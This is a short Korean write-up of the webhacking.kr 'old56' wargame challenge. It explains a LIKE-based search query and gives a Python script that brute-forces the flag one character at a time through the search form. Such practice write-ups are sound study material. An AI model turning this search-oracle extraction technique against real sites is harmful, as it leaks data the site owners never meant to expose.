webhacking.kr - old56

처음에 접속하면 위와 같이 나옵니다.

readme 를 보면 권한이 없다고 나오고,

hi~ 를 클릭하면

hello~라는 문자가 있는 내용이 나옵니다.

h 를 입력하면

가 나오고

he를 입력하면

이라고 나오니까 쿼리문이

select * from ~ where [내용문] like %search% 형식으로 되어있을거라고

유추 가능합니다.

따라서 아래와 같이 파이썬 코드를 작성해서 돌리면

import requests
import string


num_alpa = string.ascii_letters + string.digits + "_"

flag = 'flag{himiko'
URL="https://webhacking.kr/challenge/web-33/"

for i in range(0, 100) :
    for tmp in num_alpa :
        data = {'search': flag+tmp}
        res = requests.post(url=URL, data=data)
        print(res.text)
        print(flag+tmp)
        if 'admin' in res.text :
            print("[+] add : " + tmp)
            flag += tmp
            print("[+] now : " + flag)
            break
print(flag)

플래그를 확득할 수 있다.